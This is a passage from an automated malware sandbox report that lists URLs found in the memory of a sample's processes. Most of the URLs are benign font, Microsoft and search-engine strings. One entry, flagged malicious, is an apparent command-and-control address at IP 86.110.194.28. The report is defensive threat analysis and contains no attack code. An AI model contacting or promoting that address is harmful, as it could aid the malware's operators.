                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2513469202.000001BD9BD83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/DPleasewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fonts.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.microsoft.cpowershell.exe, 00000001.00000002.2676516036.000001BDA4085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleasewnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cnwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezZ1Y43bxxV.exe, 00000000.00000002.1692715028.0000000002601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://86.110.HwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2513469202.000001BD9BE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.comwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icownWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                		high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.micpowershell.exe, 00000006.00000002.2593591623.0000027760C06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2433222897.0000023050483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518697847.0000022B3589F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.micJpowershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                            		high
                                                                                                            http://crl.ver)svchost.exe, 00000013.00000002.2903834268.000001F814200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001355D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C22000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133FF000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B96000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136BB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013701000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C68000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013192000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000133B9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135E9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013675000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001362F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001348B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CAE000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134D1000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013445000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001332D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                                  		high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brwyPcM5nqV0.16.drfalse
                                                                                                                    		high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.carterandcone.comlwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.mic8powershell.exe, 00000002.00000002.2590195595.00000170BEF28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.founder.com.cn/cnwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1834144295.000001BD8BF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.0000027748B1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B259E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.jiyu-kobo.co.jp/wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.fontbureau.com/designers8wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.3051825969.000000001F752000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://86.110.HjjwnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1834144295.000001BD8BD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1831771750.00000170A6A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1821187108.0000023040411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1834253606.00000277488F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843352066.0000022B257C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.mozilla.orgwyPcM5nqV0.16.drfalse
                                                                                                                                          		high
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExampleswnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001334E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013696000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001357E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013394000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013308000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C43000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A9F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013B2B000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BB7000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000135C4000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000134AC000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013C89000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001360A000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013538000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013BFD000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013466000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013420000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001316D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 